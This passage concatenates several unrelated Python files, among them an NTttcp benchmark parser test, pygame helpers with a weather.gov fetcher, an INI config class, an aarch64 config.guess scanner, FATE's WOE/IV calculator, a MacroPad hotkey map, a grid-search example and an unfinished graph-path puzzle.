'sender cpu': '36.234',
'sender cycles': '87.514',
'sender dpcs': '17108.590',
'sender errors': '0',
'sender interrupts': '35302.624',
'sender io': '2',
'sender_name': None,
'sender packets_received': '1092639',
'sender packets_retransmitted': '10',
'sender packets_sent': '2910833',
'sender realtime': '60.015000',
'sender rb': -1,
'sender sb': -1,
'sender threads_avg_bytes_per_compl': '150.000',
'sender total_buffers': '14577884.000',
'sender total_bytes': '2085.383034',
'send_socket_buff': '8192',
'sync_port': 'False',
'udp': 'False',
'use_ipv6': 'False',
'verbose': 'False',
'verify_data': 'False',
'wait_all': 'False',
'wait_timeout_milliseconds': '600000',
'warmup_time': '30000',
'wsa': 'False',
}
expected_thread_0_metadata = expected_metadata.copy()
expected_thread_0_metadata['thread_index'] = '0'
expected_thread_1_metadata = expected_metadata.copy()
expected_thread_1_metadata['thread_index'] = '1'
expected_samples = [
sample.Sample('Total Throughput', 291.485, 'Mbps', expected_metadata),
sample.Sample('Thread Throughput', 147.105, 'Mbps',
expected_thread_0_metadata),
sample.Sample('Thread Throughput', 144.379, 'Mbps',
expected_thread_1_metadata)
]
self.assertSampleListsEqualUpToTimestamp(expected_samples, samples)
def testNtttcpUdpParsing(self):
samples = ntttcp.ParseNtttcpResults(self.xml_udp_send_results,
self.xml_udp_rec_results, {})
expected_metadata = {
'async': 'False',
'bind_sender': 'False',
'cooldown_time': '30000',
'dash_n_timeout': '10800000',
'max_active_threads': '2',
'no_sync': 'False',
'port': '5003',
'receiver avg_bytes_per_compl': '128.000',
'receiver avg_frame_size': '99.200',
'receiver avg_packets_per_dpc': '6.147',
'receiver avg_packets_per_interrupt': '3.838',
'receiver bufferCount': '9223372036854775807',
'receiver bufferLen': '128',
'receiver cpu': '51.120',
'receiver cycles': '189.967',
'receiver dpcs': '38835.774',
'receiver errors': '0',
'receiver interrupts': '62200.183',
'receiver io': '2',
'receiver packets_received': '14326674',
'receiver packets_retransmitted': '0',
'receiver packets_sent': '0',
'receiver realtime': '60.015000',
'receiver rb': -1,
'receiver sb': -1,
'receiver threads_avg_bytes_per_compl': '128.000',
'receiver throughput': '189.447',
'receiver total_buffers': '11103157.000',
'receiver total_bytes': '1355.365845',
'recv_socket_buff': '-1',
'run_time': '60000',
'sender avg_bytes_per_compl': '128.000',
'sender avg_frame_size': '128.000',
'sender avg_packets_per_dpc': '0.000',
'sender avg_packets_per_interrupt': '0.000',
'sender bufferCount': '9223372036854775807',
'sender bufferLen': '128',
'sender cpu': '68.290',
'sender cycles': '196.108',
'sender dpcs': '250.737',
'sender errors': '0',
'sender interrupts': '1669.516',
'sender io': '2',
'sender_name': None,
'sender packets_received': '0',
'sender packets_retransmitted': '0',
'sender packets_sent': '14368008',
'sender realtime': '60.015000',
'sender rb': -1,
'sender sb': -1,
'sender threads_avg_bytes_per_compl': '128.000',
'sender total_buffers': '14368009.000',
'sender total_bytes': '1753.907349',
'send_socket_buff': '8192',
'sync_port': 'False',
'udp': 'True',
'use_ipv6': 'False',
'verbose': 'False',
'verify_data': 'False',
'wait_all': 'False',
'wait_timeout_milliseconds': '600000',
'warmup_time': '30000',
'wsa': 'False',
}
expected_thread_0_metadata = expected_metadata.copy()
expected_thread_0_metadata['thread_index'] = '0'
expected_thread_1_metadata = expected_metadata.copy()
expected_thread_1_metadata['thread_index'] = '1'
expected_samples = [
sample.Sample('Total Throughput', 245.153, 'Mbps', expected_metadata),
sample.Sample('Thread Throughput', 121.160, 'Mbps',
expected_thread_0_metadata),
sample.Sample('Thread Throughput', 123.993, 'Mbps',
expected_thread_1_metadata)
]
self.assertSampleListsEqualUpToTimestamp(expected_samples, samples)
def testSingleConfigParse(self):
ntttcp.FLAGS.ntttcp_config_list = ['True:7:800:INTERNAL:1']
expected_list = [
NtttcpConf(
udp=True, threads=7, time_s=800, ip_type='INTERNAL', packet_size=1)
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
def testEmptyConfig(self):
ntttcp.FLAGS.ntttcp_config_list = []
expected_list = [
NtttcpConf(
udp=FLAGS.ntttcp_udp,
threads=FLAGS.ntttcp_threads,
time_s=FLAGS.ntttcp_time,
ip_type=FLAGS.ip_addresses,
packet_size=FLAGS.ntttcp_packet_size)
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
def testMultiConfigParse(self):
ntttcp.FLAGS.ntttcp_config_list = [
'True:7:800:INTERNAL:1', 'False:1:2:EXTERNAL:2',
'True:44:1001:INTERNAL:3'
]
expected_list = [
NtttcpConf(
udp=True, threads=7, time_s=800, ip_type='INTERNAL', packet_size=1),
NtttcpConf(
udp=False, threads=1, time_s=2, ip_type='EXTERNAL', packet_size=2),
NtttcpConf(
udp=True,
threads=44,
time_s=1001,
ip_type='INTERNAL',
packet_size=3),
]
conf_list = ntttcp.ParseConfigList()
self.assertListEqual(conf_list, expected_list)
@parameterized.parameterized.expand(
[('MissingVal', ['True:7:800:INTERNAL:1', 'False::2:EXTERNAL:2']),
('Misspell', ['rue:7:800:INTERNAL:3', 'True:44:1001:EXTERNAL:4']),
('WrongOrder', ['True:7:INTERNAL:800:1', '44:True:1001:EXTERNAL:6'])])
def testMalformedConfig(self, name, conf):
with self.assertRaises(flags.IllegalFlagValueError):
ntttcp.FLAGS.ntttcp_config_list = conf
if __name__ == '__main__':
unittest.main()
|
# Some pygame helper functions for simple image display
# and sound effect playback
# Rob Miles July 2017
# Version 1.0
import pygame
surface = None
def setup(width=800, height=600, title=''):
'''
Sets up the pygame environment
'''
global window_size
global back_color
global text_color
global image
global surface
# Don't initialise if we already have
if surface is not None:
return
window_size = (width, height)
back_color = (255, 255, 255)
text_color = (255, 0, 0)
image = None
# pre initialise pyGame's audio engine to avoid sound latency issues
pygame.mixer.pre_init(frequency=44100)
pygame.init()
# initialise pyGame's audio engine
pygame.mixer.init()
# Create the game surface
surface = pygame.display.set_mode(window_size)
clear_display()
pygame.display.set_caption(title)
def handle_events():
'''
Consume events that are generated by the pygame window
    These are not presently used for anything
'''
setup()
for event in pygame.event.get():
pass
def play_sound(filepath):
'''
Plays the specified sound file
'''
pygame.mixer.init()
sound = pygame.mixer.Sound(filepath)
sound.play()
def display_image(filepath):
'''
Displays the image from the given filepath
Starts pygame if required
May throw exceptions
'''
global surface
global window_size
global image
handle_events()
image = pygame.image.load(filepath)
image = pygame.transform.smoothscale(image, window_size)
surface.blit(image, (0, 0))
pygame.display.flip()
def clear_display():
'''
Clears the display to the background colour
and the image (if any) on top of it
'''
global surface
global image
global back_color
handle_events()
surface.fill(back_color)
if image is not None:
surface.blit(image, (0, 0))
def get_display_lines(text, font, width):
'''
Returns a list of strings which have been split
to fit the given window width using the supplied font
'''
space_width = font.size(' ')[0]
result = []
text_lines = text.splitlines()
for text_line in text_lines:
words = text_line.split()
x = 0
line = ''
for word in words:
word_width = font.size(word)[0]
if x + word_width > width:
# Remove the trailing space from the line
# before adding to the list of lines to return
line = line.strip()
result.append(line)
line = word + ' '
x = word_width + space_width
else:
line = line + word + ' '
x = x + word_width + space_width
if line != '':
# Got a partial line to add to the end
# Remove the trailing space from the line
# before adding to the list of lines to return
line = line.strip()
result.append(line)
return result
def display_message(text, size=200, margin=20, horiz='center', vert='center',
color=(255, 0, 0)):
'''
Displays the text as a message
    Size can be used to select the size of the
text
'''
global window_size
global surface
handle_events()
clear_display()
# Get the text version of the input
text = str(text)
font = pygame.font.Font(None, size)
available_width = window_size[0] - (margin * 2)
lines = get_display_lines(text, font, available_width)
rendered_lines = []
height = 0
for line in lines:
rendered_line = font.render(line, 1, color)
height += rendered_line.get_height()
rendered_lines.append(rendered_line)
if height > window_size[1]:
raise Exception('Text too large for window')
if vert == 'center':
y = (window_size[1] - height) / 2.0
elif vert == 'top':
y = margin
elif vert == 'bottom':
        y = (window_size[1] - margin) - height
for rendered_line in rendered_lines:
width = rendered_line.get_width()
height = rendered_line.get_height()
if horiz == 'center':
x = (available_width - width) / 2.0 + margin
elif horiz == 'left':
x = margin
elif horiz == 'right':
            x = window_size[0] - width - margin
surface.blit(rendered_line, (x, y))
y += height
pygame.display.flip()
import urllib.request
import xml.etree.ElementTree
def get_weather_temp(latitude,longitude):
'''
Uses forecast.weather.gov to get the weather
for the specified latitude and longitude
'''
url="http://forecast.weather.gov/MapClick.php?lat={0}&lon={1}&unit=0&lg=english&FcstType=dwml".format(latitude,longitude)
req=urllib.request.urlopen(url)
page=req.read()
doc=xml.etree.ElementTree.fromstring(page)
# I'm not proud of this, but by gum it works...
for child in doc:
if child.tag == 'data':
if child.attrib['type'] == 'current observations':
for item in child:
if item.tag == 'parameters':
for i in item:
if i.tag == 'temperature':
if i.attrib['type'] == 'apparent':
for t in i:
if t.tag =='value':
return int(t.text)
def get_weather_desciption(latitude,longitude):
'''
Uses forecast.weather.gov to get the weather
for the specified latitude and longitude
'''
url="http://forecast.weather.gov/MapClick.php?lat={0}&lon={1}&unit=0&lg=english&FcstType=dwml".format(latitude,longitude)
req=urllib.request.urlopen(url)
page=req.read()
doc=xml.etree.ElementTree.fromstring(page)
# I'm not proud of this, but by gum it works...
for child in doc:
if child.tag == 'data':
if child.attrib['type'] == 'current observations':
for item in child:
if item.tag == 'parameters':
for i in item:
if i.tag == 'weather':
for t in i:
if t.tag == 'weather-conditions':
if t.get('weather-summary') is not None:
return t.get('weather-summary')
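# Hedged usage sketch (illustrative only, not part of the original helpers): the
# coordinates and message below are assumptions. Requires a display, and
# forecast.weather.gov only covers US locations.
#
#     setup(800, 600, 'Weather demo')
#     latitude, longitude = 47.61, -122.33  # assumed example coordinates (Seattle)
#     temp = get_weather_temp(latitude, longitude)
#     summary = get_weather_desciption(latitude, longitude)
#     display_message('{0}, {1} F'.format(summary, temp))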
|
#~ # coding: utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import with_statement
import os
import sys
import logging
from six.moves import configparser
import threading
import codecs
logger = logging.getLogger('Config')
class Config:
def __init__(self, workingpath, name):
self.name = name
self.wp = workingpath
self.datapath = None
self.cfg = configparser.RawConfigParser()
self.cfg.save = self.save
self.lock = threading.Lock()
self.mode = self.install_check()
if self.mode:
self.load(self.mode)
def install_check(self):
returnv = None
datapath, inipath = self.pathes_get('portable')
logger.debug('Check for File: %s'%inipath)
if os.path.isfile(inipath):
returnv = 'portable'
inipath = self.pathes_get('local')[1]
logger.debug('Check for File: %s'%inipath)
if os.path.isfile(inipath):
returnv = 'local'
logger.info('Install Check returns: %s'%returnv)
self.mode = returnv
return returnv
def load(self,mode):
inipath = self.pathes_get(mode)[1]
self.lock.acquire()
self.cfg.read(inipath)
self.lock.release()
def save(self,mode=None):
self.lock.acquire()
if not mode:
mode = self.mode
folderpath,inipath = self.pathes_get(mode)
logger.info('Create Folder: %s'%folderpath)
if not os.path.isdir(folderpath):
os.makedirs(folderpath)
with codecs.open(inipath,'wb', "utf8") as inifile:
self.cfg.write(inifile)
if not self.mode:
self.install_check()
self.lock.release()
def reset(self):
self.cfg = configparser.RawConfigParser()
import shutil
pathes = []
pathes.append(self.pathes_get('portable')[0])
pathes.append(self.pathes_get('local')[0])
for path in pathes:
logger.info('Cleaning up %s'%path)
shutil.rmtree(path,True)
def pathes_get(self, mode):
        logger.info('Get Paths %s' % mode)
if mode == 'portable':
folderpath = os.path.join(self.wp,'data')
filepath = os.path.join(folderpath,'%s.ini'%self.name)
return (folderpath,filepath)
elif mode == 'local':
folderpath = os.path.expanduser('~/.config/%s'%self.name)
filepath = os.path.join(folderpath,'%s.ini'%self.name)
return (folderpath,filepath)
else:
return None
def set(self,section,option,value):
if not self.cfg.has_section(section):
self.cfg.add_section(section)
self.cfg.set(section,option,value)
def get(self,section,option):
if not self.mode:
return None
if not self.cfg.has_section(section):
return None
if not self.cfg.has_option(section,option):
return None
return self.cfg.get(section,option)
def cfg_create(self,lang):
try:
self.cfg.add_section(self.name)
        except configparser.DuplicateSectionError:
            pass
self.cfg.set(self.name, 'language', lang)
import unittest
class TestFS(unittest.TestCase):
@classmethod
def setUpClass(cls):
import logging
logging.basicConfig(format="[%(levelname)-7s] (%(name)s) %(asctime)s.%(msecs)-3d Thread:%(thread)s/%(module)s[%(lineno)-3d]/%(funcName)-10s %(message)-8s ", level=logging.DEBUG)
workingpath = os.path.dirname(os.path.realpath(__file__))
cls._cfg = Config(workingpath,'test')
cls._cfg.reset()
@classmethod
def tearDownClass(cls):
cls._cfg.reset()
def test_1_save_portable(cls):
cls._cfg.save('portable')
        assert cls._cfg.install_check() == 'portable'
#~ def test_2_reset(cls):
#~ cls._cfg.reset()
#~ assert cls._cfg.install_check() == None
#~ def test_3_save_portable(cls):
#~ cls._cfg.save('local')
#~ assert cls._cfg.install_check() == 'local'
#~ def test_4_reset(cls):
#~ cls._cfg.reset()
#~ assert cls._cfg.install_check() == None
def test_5_add_get(cls):
cls._cfg.set('test','nr','1')
assert cls._cfg.get('test','nr') == '1'
cls._cfg.set('test','nr',u'1')
assert cls._cfg.get('test','nr') == '1'
cls._cfg.save('portable')
def test_6_restart_get(cls):
workingpath = os.path.dirname(os.path.realpath(__file__))
cls._cfg = Config(workingpath,'test')
assert cls._cfg.get('test','nr') == '1'
if __name__ == '__main__':
unittest.main()
#~ print u'e' + b'\u0301'
|
"""
Copyright 2017 Arm Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import os
from .config_guess_issue import ConfigGuessIssue
from .config_guess_remark import ConfigGuessRemark
from .scanner import Scanner
class ConfigGuessScanner(Scanner):
"""Scanner that scans config.guess files for aarch64 support."""
def accepts_file(self, filename):
return os.path.basename(filename) == 'config.guess'
def scan_file_object(self, filename, file, report):
for line in file:
if 'aarch64:Linux' in line:
report.add_remark(ConfigGuessRemark(filename=filename))
break
else:
report.add_issue(ConfigGuessIssue(filename=filename))
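# Hedged usage sketch (illustrative only, not part of the scanner package): a minimal
# in-memory report object is assumed here just to show the scan flow, and the Scanner
# base class is assumed to need no constructor arguments.
#
#     import io
#
#     class _Report:
#         def __init__(self):
#             self.remarks, self.issues = [], []
#         def add_remark(self, remark):
#             self.remarks.append(remark)
#         def add_issue(self, issue):
#             self.issues.append(issue)
#
#     scanner = ConfigGuessScanner()
#     report = _Report()
#     if scanner.accepts_file('config.guess'):
#         scanner.scan_file_object('config.guess', io.StringIO('aarch64:Linux\n'), report)
#     # report.remarks now holds a ConfigGuessRemark for this aarch64-aware file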
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import math
import operator
import numpy as np
from federatedml.feature.binning.base_binning import BaseBinning
from federatedml.feature.binning.bin_result import BinColResults, MultiClassBinResult
from federatedml.statistic import data_overview
from federatedml.feature.sparse_vector import SparseVector
from federatedml.cipher_compressor.compressor import PackingCipherTensor
from federatedml.util import LOGGER
class IvCalculator(object):
def __init__(self, adjustment_factor, role, party_id):
self.adjustment_factor = adjustment_factor
self.role = role
self.party_id = party_id
def cal_local_iv(self, data_instances, split_points,
labels=None, label_counts=None, bin_cols_map=None,
label_table=None):
"""
data_bin_table : Table.
            Each element represents the bin number that the corresponding feature value falls into.
e.g. it could be:
[{'x1': 1, 'x2': 5, 'x3': 2}
...
]
Returns:
MultiClassBinResult object
"""
header = data_instances.schema.get("header")
if bin_cols_map is None:
bin_cols_map = {name: idx for idx, name in enumerate(header)}
bin_indexes = [idx for idx, _ in enumerate(header)]
else:
bin_indexes = []
for h in header:
if h in bin_cols_map:
bin_indexes.append(bin_cols_map[h])
if label_counts is None:
label_counts = data_overview.get_label_count(data_instances)
labels = list(label_counts.keys())
label_counts = [label_counts[k] for k in labels]
data_bin_table = BaseBinning.get_data_bin(data_instances, split_points, bin_cols_map)
sparse_bin_points = BaseBinning.get_sparse_bin(bin_indexes, split_points, header)
sparse_bin_points = {header[k]: v for k, v in sparse_bin_points.items()}
if label_table is None:
label_table = self.convert_label(data_instances, labels)
result_counts = self.cal_bin_label(data_bin_table, sparse_bin_points, label_table, label_counts)
multi_bin_res = self.cal_iv_from_counts(result_counts, labels,
role=self.role,
party_id=self.party_id)
for col_name, sp in split_points.items():
multi_bin_res.put_col_split_points(col_name, sp)
return multi_bin_res
def cal_iv_from_counts(self, result_counts, labels, role, party_id):
result = MultiClassBinResult(labels)
result.set_role_party(role, party_id)
if len(labels) == 2:
col_result_obj_dict = self.cal_single_label_iv_woe(result_counts,
self.adjustment_factor)
for col_name, bin_col_result in col_result_obj_dict.items():
result.put_col_results(col_name=col_name, col_results=bin_col_result)
else:
for label_idx, y in enumerate(labels):
this_result_counts = self.mask_label(result_counts, label_idx)
col_result_obj_dict = self.cal_single_label_iv_woe(this_result_counts,
self.adjustment_factor)
for col_name, bin_col_result in col_result_obj_dict.items():
result.put_col_results(col_name=col_name, col_results=bin_col_result, label_idx=label_idx)
return result
@staticmethod
def mask_label(result_counts, label_idx):
def _mask(counts):
res = []
for c in counts:
res.append(np.array([c[label_idx], np.sum(c) - c[label_idx]]))
return res
return result_counts.mapValues(_mask)
def cal_bin_label(self, data_bin_table, sparse_bin_points, label_table, label_counts):
"""
data_bin_table : Table.
            Each element represents the bin number that the corresponding feature value falls into.
e.g. it could be:
[{'x1': 1, 'x2': 5, 'x3': 2}
...
]
sparse_bin_points: dict
Dict of sparse bin num
{"x0": 2, "x1": 3, "x2": 5 ... }
label_table : Table
id with labels
Returns:
Table with value:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
"""
data_bin_with_label = data_bin_table.join(label_table, lambda x, y: (x, y))
f = functools.partial(self.add_label_in_partition,
sparse_bin_points=sparse_bin_points)
result_counts = data_bin_with_label.mapReducePartitions(f, self.aggregate_partition_label)
return result_counts
def cal_single_label_iv_woe(self, result_counts, adjustment_factor):
"""
        Given event count information, calculate IV information.
Parameters
----------
result_counts: dict or table.
It is like:
{'x1': [[event_count, non_event_count], [event_count, non_event_count] ... ],
'x2': [[event_count, non_event_count], [event_count, non_event_count] ... ],
...
}
adjustment_factor : float
The adjustment factor when calculating WOE
Returns
-------
Dict of IVAttributes object
{'x1': attr_obj,
'x2': attr_obj
...
}
"""
if isinstance(result_counts, dict):
col_result_obj_dict = {}
for col_name, data_event_count in result_counts.items():
col_result_obj = self.woe_1d(data_event_count, adjustment_factor)
col_result_obj_dict[col_name] = col_result_obj
else:
woe_1d = functools.partial(self.woe_1d, adjustment_factor=adjustment_factor)
col_result_obj_dict = dict(result_counts.mapValues(woe_1d).collect())
return col_result_obj_dict
@staticmethod
def fill_sparse_result(col_name, static_nums, sparse_bin_points, label_counts):
"""
Parameters
----------
col_name: str
current col_name, use to obtain sparse point
static_nums : list.
It is like:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
where the bin of sparse point located in is empty.
sparse_bin_points : dict
Dict of sparse bin num
{"x1": 2, "x2": 3, "x3": 5 ... }
label_counts: np.array
eg. [100, 200, ...]
Returns
-------
The format is same as static_nums.
"""
curt_all = functools.reduce(lambda x, y: x + y, static_nums)
sparse_bin = sparse_bin_points.get(col_name)
static_nums[sparse_bin] = label_counts - curt_all
return col_name, static_nums
@staticmethod
def combine_labels(result_counts, idx):
"""
result_counts: Table
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
idx: int
Returns:
"""
@staticmethod
def add_label_in_partition(data_bin_with_table, sparse_bin_points):
"""
        Accumulate all labels so that it becomes convenient to calculate WOE and IV
Parameters
----------
data_bin_with_table : Table
The input data, the Table is like:
(id, {'x1': 1, 'x2': 5, 'x3': 2}, y)
where y = [is_label_0, is_label_1, ...] which is one-hot format array of label
sparse_bin_points: dict
Dict of sparse bin num
{0: 2, 1: 3, 2:5 ... }
Returns
-------
['x1', [[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ],
'x2', [[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ],
...
]
"""
result_sum = {}
for _, datas in data_bin_with_table:
bin_idx_dict = datas[0]
y = datas[1]
for col_name, bin_idx in bin_idx_dict.items():
result_sum.setdefault(col_name, [])
col_sum = result_sum[col_name]
while bin_idx >= len(col_sum):
if isinstance(y, PackingCipherTensor):
zero_y = np.zeros(y.dim)
col_sum.append(PackingCipherTensor(zero_y.tolist()))
else:
col_sum.append(np.zeros(len(y)))
# if bin_idx == sparse_bin_points[col_name]:
# continue
col_sum[bin_idx] = col_sum[bin_idx] + y
return list(result_sum.items())
@staticmethod
def aggregate_partition_label(sum1, sum2):
"""
Used in reduce function. Aggregate the result calculate from each partition.
Parameters
----------
sum1 : list.
It is like:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
sum2 : list
Same as sum1
Returns
-------
Merged sum. The format is same as sum1.
"""
if sum1 is None and sum2 is None:
return None
if sum1 is None:
return sum2
if sum2 is None:
return sum1
for idx, label_sum2 in enumerate(sum2):
if idx >= len(sum1):
sum1.append(label_sum2)
else:
sum1[idx] = sum1[idx] + label_sum2
return sum1
@staticmethod
def woe_1d(data_event_count, adjustment_factor):
"""
Given event and non-event count in one column, calculate its woe value.
Parameters
----------
data_event_count : list
[(event_sum, non-event_sum), (same sum in second_bin), (in third bin) ...]
adjustment_factor : float
The adjustment factor when calculating WOE
Returns
-------
IVAttributes : object
Stored information that related iv and woe value
"""
event_total = 0
non_event_total = 0
for bin_res in data_event_count:
if len(bin_res) != 2:
                raise ValueError(f"bin_res should have length 2,"
                                 f" data_event_count: {data_event_count}, bin_res: {bin_res}")
event_total += bin_res[0]
non_event_total += bin_res[1]
if event_total == 0:
# raise ValueError("NO event label in target data")
event_total = 1
if non_event_total == 0:
# raise ValueError("NO non-event label in target data")
non_event_total = 1
iv = 0
event_count_array = []
non_event_count_array = []
event_rate_array = []
non_event_rate_array = []
woe_array = []
iv_array = []
for event_count, non_event_count in data_event_count:
if event_count == 0 or non_event_count == 0:
event_rate = 1.0 * (event_count + adjustment_factor) / event_total
non_event_rate = 1.0 * (non_event_count + adjustment_factor) / non_event_total
else:
event_rate = 1.0 * event_count / event_total
non_event_rate = 1.0 * non_event_count / non_event_total
woe_i = math.log(event_rate / non_event_rate)
event_count_array.append(int(event_count))
non_event_count_array.append(int(non_event_count))
event_rate_array.append(event_rate)
non_event_rate_array.append(non_event_rate)
woe_array.append(woe_i)
iv_i = (event_rate - non_event_rate) * woe_i
iv_array.append(iv_i)
iv += iv_i
return BinColResults(woe_array=woe_array, iv_array=iv_array, event_count_array=event_count_array,
non_event_count_array=non_event_count_array,
event_rate_array=event_rate_array, non_event_rate_array=non_event_rate_array, iv=iv)
@staticmethod
def statistic_label(data_instances):
label_counts = data_overview.get_label_count(data_instances)
label_elements = list(label_counts.keys())
label_counts = [label_counts[k] for k in label_elements]
return label_elements, label_counts
@staticmethod
def convert_label(data_instances, label_elements):
def _convert(instance):
res_labels = np.zeros(len(label_elements))
res_labels[label_elements.index(instance.label)] = 1
return res_labels
label_table = data_instances.mapValues(_convert)
return label_table
@staticmethod
def woe_transformer(data_instances, bin_inner_param, multi_class_bin_res: MultiClassBinResult,
abnormal_list=None):
if abnormal_list is None:
abnormal_list = []
bin_res = multi_class_bin_res.bin_results[0]
transform_cols_idx = bin_inner_param.transform_bin_indexes
split_points_dict = bin_res.all_split_points
is_sparse = data_overview.is_sparse_data(data_instances)
def convert(instances):
if is_sparse:
all_data = instances.features.get_all_data()
indice = []
sparse_value = []
data_shape = instances.features.get_shape()
for col_idx, col_value in all_data:
if col_idx in transform_cols_idx:
if col_value in abnormal_list:
indice.append(col_idx)
sparse_value.append(col_value)
continue
                        # A missing value may have been added into the sparse data; bin it and map it to its WOE below
col_name = bin_inner_param.header[col_idx]
split_points = split_points_dict[col_name]
bin_num = BaseBinning.get_bin_num(col_value, split_points)
indice.append(col_idx)
col_results = bin_res.all_cols_results.get(col_name)
woe_value = col_results.woe_array[bin_num]
sparse_value.append(woe_value)
else:
indice.append(col_idx)
sparse_value.append(col_value)
sparse_vector = SparseVector(indice, sparse_value, data_shape)
instances.features = sparse_vector
else:
features = instances.features
assert isinstance(features, np.ndarray)
transform_cols_idx_set = set(transform_cols_idx)
for col_idx, col_value in enumerate(features):
if col_idx in transform_cols_idx_set:
if col_value in abnormal_list:
features[col_idx] = col_value
continue
col_name = bin_inner_param.header[col_idx]
split_points = split_points_dict[col_name]
bin_num = BaseBinning.get_bin_num(col_value, split_points)
col_results = bin_res.all_cols_results.get(col_name)
woe_value = col_results.woe_array[bin_num]
features[col_idx] = woe_value
instances.features = features
return instances
return data_instances.mapValues(convert)
@staticmethod
def check_containing_missing_value(data_instances):
is_sparse = data_overview.is_sparse_data(data_instances)
def _sparse_check(instance):
result = set()
sparse_data = instance.features.get_all_data()
for col_idx, col_value in sparse_data:
if np.isnan(col_value):
result.add(col_idx)
return result
if is_sparse:
has_missing_value = data_instances.mapValues(_sparse_check).reduce(
lambda a, b: a.union(b)
)
else:
has_missing_value = data_instances.mapValues(lambda x: x.features).reduce(operator.add)
has_missing_value = {idx for idx, value in enumerate(has_missing_value) if np.isnan(value)}
return has_missing_value
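# Hedged worked example (illustrative only, not part of FATE): woe_1d computes, for each
# bin, woe_i = ln(event_rate / non_event_rate) and iv_i = (event_rate - non_event_rate) * woe_i,
# then sums the iv_i into the column IV. The counts below are made-up numbers.
#
#     counts = [np.array([10, 90]), np.array([40, 60]), np.array([50, 50])]
#     # event_total = 100, non_event_total = 200
#     # first bin: woe = ln((10 / 100) / (90 / 200)) ~= -1.504
#     bin_result = IvCalculator.woe_1d(counts, adjustment_factor=0.5)
#     # bin_result.woe_array, bin_result.iv_array and bin_result.iv hold the per-bin
#     # WOE values, per-bin IV contributions and the total IV for the column.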
|
# MACROPAD Hotkeys: Audacity
from adafruit_hid.keycode import Keycode
from adafruit_hid.consumer_control_code import ConsumerControlCode
app = {
'name' : 'Audacity',
'order': 4, # Application order on the keyboard
'macros' : [
# COLOR LABEL KEY SEQUENCE
# 1st row ----------
(0x0000ff, 'Record ', 'R'),
(0x0000ff, 'Up ', [Keycode.UP_ARROW]),
(0xff0000, 'NEW ', [Keycode.SHIFT, Keycode.R]),
# 2nd row ----------
(0x0000ff, 'START ', [Keycode.HOME]),
(0x0000ff, 'Down ', [Keycode.DOWN_ARROW]),
(0x0000ff, 'END', [Keycode.END]),
# 3rd row ----------
(0xeeeeee, 'SIL ', [Keycode.COMMAND, Keycode.L]),
(0x00ff00, 'Play ', [Keycode.SPACEBAR]),
(0xeeeeee, 'Cut ', [Keycode.COMMAND, Keycode.X]),
# 4th row ----------
(0x00ff00, 'HOME', [Keycode.HOME]),
(0x00ff00, 'PG DWN ', [Keycode.PAGE_DOWN]),
(0x00ff00, 'END ', [Keycode.END]),
]
} |
"""
============================
Grid Search Example
============================
An example of how to use Metaheuristics and GridSearch
"""
from feature_selection import HarmonicSearch
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
dataset = load_breast_cancer()
X, y = dataset['data'], dataset['target_names'].take(dataset['target'])
sc_X = StandardScaler()
X = sc_X.fit_transform(X)
# Classifier to be used in the metaheuristic
# (a RandomForestClassifier is used below; swap in SVC() to try a support vector machine instead)
clf = RandomForestClassifier()
# Quick sanity check: fit on the full data and compare predictions with the labels
clf.fit(X, y)
clf.predict(X) == y
# Parameter Grid
param_grid= {
"HMCR":[0, 0.5, 0.95],
"indpb":[0.05, 0.5, 1],
"pitch":[0.05, 0.5, 1],
"repeat":[3]
}
hs = HarmonicSearch(estimator=clf, make_logbook=True)
grid_search = GridSearchCV(hs, param_grid=param_grid, scoring=hs.score_func_to_gridsearch, cv=4,
verbose=2)
grid_search.fit(X,y)
grid_search.best_params_
results = pd.DataFrame.from_dict(grid_search.cv_results_)
|
"""
This problem was asked by Google.
In a directed graph, each node is assigned an uppercase letter. We define a path's value as the number of occurrences of the most frequently-occurring letter along that path. For example, if a path in the graph goes through "ABACA", the value of the path is 3, since there are 3 occurrences of 'A' on the path.
Given a graph with n nodes and m directed edges, return the largest value path of the graph. If the largest value is infinite, then return null.
The graph is represented with a string and an edge list. The i-th character represents the uppercase letter of the i-th node. Each tuple in the edge list (i, j) means there is a directed edge from the i-th node to the j-th node. Self-edges are possible, as well as multi-edges.
For example, the following input graph:
ABACA
[(0, 1),
(0, 2),
(2, 3),
(3, 4)]
Would have maximum value 3 using the path of vertices [0, 2, 3, 4], (A, A, C, A).
The following input graph:
A
[(0, 0)]
Should return null, since we have an infinite loop.
"""
class GraphPath:
    def __init__(self, nodes=None, letter_counts=None):
        # Avoid mutable default arguments, which would be shared across instances
        self.nodes = nodes if nodes is not None else set()
        self.letter_counts = letter_counts if letter_counts is not None else dict()
def __repr__(self):
return "nodes={}, letters={}".format(self.nodes, self.letter_counts)
def get_max_value_string(graph_path, node, adjacency_map):
if node in graph_path.nodes:
return [graph_path]
new_nodes = graph_path.nodes.copy()
new_nodes.add(node)
new_letter_counts = graph_path.letter_counts.copy()
if node[0] not in new_letter_counts:
